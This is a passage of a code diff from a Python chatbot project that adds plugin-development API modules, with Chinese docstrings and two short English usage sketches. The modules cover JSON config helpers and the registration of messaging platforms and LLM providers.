raise ValueError("value 只支持 str, int, float, bool, list 类型。")
|
||||
path = f"data/config/{namespace}.json"
|
||||
if not os.path.exists(path):
|
||||
with open(path, "w", encoding="utf-8-sig") as f:
|
||||
f.write("{}")
|
||||
with open(path, "r", encoding="utf-8-sig") as f:
|
||||
d = json.load(f)
|
||||
assert isinstance(d, dict)
|
||||
if key not in d:
|
||||
d[key] = {
|
||||
"config_type": "item",
|
||||
"name": name,
|
||||
"description": description,
|
||||
"path": key,
|
||||
"value": value,
|
||||
"val_type": type(value).__name__
|
||||
}
|
||||
with open(path, "w", encoding="utf-8-sig") as f:
|
||||
json.dump(d, f, indent=2, ensure_ascii=False)
|
||||
f.flush()
|
||||
|
||||
def update_config(namespace: str, key: str, value):
|
||||
'''
|
||||
更新配置文件中的配置项。
|
||||
namespace: str, 配置的唯一识别符,也就是配置文件的名字。
|
||||
key: str, 配置项的键。
|
||||
value: str, int, float, bool, list, 配置项的值。
|
||||
'''
|
||||
path = f"data/config/{namespace}.json"
|
||||
if not os.path.exists(path):
|
||||
raise FileNotFoundError(f"配置文件 {namespace}.json 不存在。")
|
||||
with open(path, "r", encoding="utf-8-sig") as f:
|
||||
d = json.load(f)
|
||||
assert isinstance(d, dict)
|
||||
if key not in d:
|
||||
raise KeyError(f"配置项 {key} 不存在。")
|
||||
d[key]["value"] = value
|
||||
with open(path, "w", encoding="utf-8-sig") as f:
|
||||
json.dump(d, f, indent=2, ensure_ascii=False)
|
||||
f.flush()
|
||||
|
||||
|
||||
|
||||
|
||||
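Put together, a hypothetical plugin named `helloworld` would use this config API roughly as follows; the data/config directory must already exist under the working directory:

```python
from util.plugin_dev.api.v1.config import load_config, put_config, update_config

NAMESPACE = "helloworld"   # should match the plugin's name so it shows up on the dashboard

# Creates the entry only if the key is missing; the value's type drives the dashboard widget.
put_config(NAMESPACE, "Greeting", "greeting", "Hello there!", "Text the bot uses to greet users.")

conf = load_config(NAMESPACE)          # {'greeting': 'Hello there!'} once the file exists
if conf and conf.get("greeting") == "Hello there!":
    update_config(NAMESPACE, "greeting", "Hi!")
```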
6
util/plugin_dev/api/v1/llm.py
Normal file
@@ -0,0 +1,6 @@
|
||||
'''
|
||||
大语言模型.
|
||||
|
||||
插件开发者可以继承这个类来做实现。
|
||||
'''
|
||||
from model.provider.provider import Provider as LLMProvider
|
||||
10
util/plugin_dev/api/v1/message.py
Normal file
@@ -0,0 +1,10 @@
|
||||
from astrbot.core import oper_msg
|
||||
from type.message import AstrMessageEvent, AstrBotMessage
|
||||
from type.command import CommandResult
|
||||
from model.platform._message_result import MessageResult
|
||||
|
||||
'''
|
||||
消息处理。在消息平台接收到消息后,调用此函数进行处理。
|
||||
集成了指令检测、指令处理、LLM 调用等功能。
|
||||
'''
|
||||
message_handler = oper_msg
|
||||
11
util/plugin_dev/api/v1/platform.py
Normal file
@@ -0,0 +1,11 @@
|
||||
'''
|
||||
消息平台。
|
||||
|
||||
Platform类是消息平台的抽象类,定义了消息平台的基本接口。
|
||||
消息平台的具体实现类需要继承Platform类,并实现其中的抽象方法。
|
||||
'''
|
||||
|
||||
from model.platform._platfrom import Platform
|
||||
|
||||
from model.platform.qq_gocq import QQGOCQ
|
||||
from model.platform.qq_official import QQOfficial
|
||||
64
util/plugin_dev/api/v1/register.py
Normal file
@@ -0,0 +1,64 @@
|
||||
'''
|
||||
允许开发者注册某一个类的实例到 LLM 或者 PLATFORM 中,方便其他插件调用。
|
||||
|
||||
必须分别实现 Platform 和 LLMProvider 中涉及的接口
|
||||
'''
|
||||
from model.provider.provider import Provider as LLMProvider
|
||||
from model.platform._platfrom import Platform
|
||||
from type.types import GlobalObject
|
||||
from type.register import RegisteredPlatform, RegisteredLLM
|
||||
|
||||
def register_platform(platform_name: str, platform_instance: Platform, context: GlobalObject) -> None:
|
||||
'''
|
||||
注册一个消息平台。
|
||||
|
||||
Args:
|
||||
platform_name: 平台名称。
|
||||
platform_instance: 平台实例。
|
||||
'''
|
||||
|
||||
# check 是否已经注册
|
||||
for platform in context.platforms:
|
||||
if platform.platform_name == platform_name:
|
||||
raise ValueError(f"Platform {platform_name} has been registered.")
|
||||
|
||||
context.platforms.append(RegisteredPlatform(platform_name, platform_instance))
|
||||
|
||||
def register_llm(llm_name: str, llm_instance: LLMProvider, context: GlobalObject) -> None:
|
||||
'''
|
||||
注册一个大语言模型。
|
||||
|
||||
Args:
|
||||
llm_name: 大语言模型名称。
|
||||
llm_instance: 大语言模型实例。
|
||||
'''
|
||||
# check 是否已经注册
|
||||
for llm in context.llms:
|
||||
if llm.llm_name == llm_name:
|
||||
raise ValueError(f"LLMProvider {llm_name} has been registered.")
|
||||
|
||||
context.llms.append(RegisteredLLM(llm_name, llm_instance))
|
||||
|
||||
def unregister_platform(platform_name: str, context: GlobalObject) -> None:
|
||||
'''
|
||||
注销一个消息平台。
|
||||
|
||||
Args:
|
||||
platform_name: 平台名称。
|
||||
'''
|
||||
for i, platform in enumerate(context.platforms):
|
||||
if platform.platform_name == platform_name:
|
||||
context.platforms.pop(i)
|
||||
return
|
||||
|
||||
def unregister_llm(llm_name: str, context: GlobalObject) -> None:
|
||||
'''
|
||||
注销一个大语言模型。
|
||||
|
||||
Args:
|
||||
llm_name: 大语言模型名称。
|
||||
'''
|
||||
for i, llm in enumerate(context.llms):
|
||||
if llm.llm_name == llm_name:
|
||||
context.llms.pop(i)
|
||||
return
|
||||
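And a hedged sketch of registering and unregistering a platform. DummyPlatform is a stand-in used only to show the call shape; a real plugin must pass an instance that actually implements the Platform interface:

```python
from type.types import GlobalObject
from util.plugin_dev.api.v1.register import register_platform, unregister_platform

class DummyPlatform:
    """Placeholder; a real platform must implement model.platform._platfrom.Platform."""
    pass

context = GlobalObject()
register_platform("my_platform", DummyPlatform(), context)
print([str(p) for p in context.platforms])   # ['my_platform']

unregister_platform("my_platform", context)
print(context.platforms)                     # []
```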
5
util/plugin_dev/api/v1/types.py
Normal file
@@ -0,0 +1,5 @@
|
||||
'''
|
||||
插件类型
|
||||
'''
|
||||
|
||||
from type.plugin import PluginType
|
||||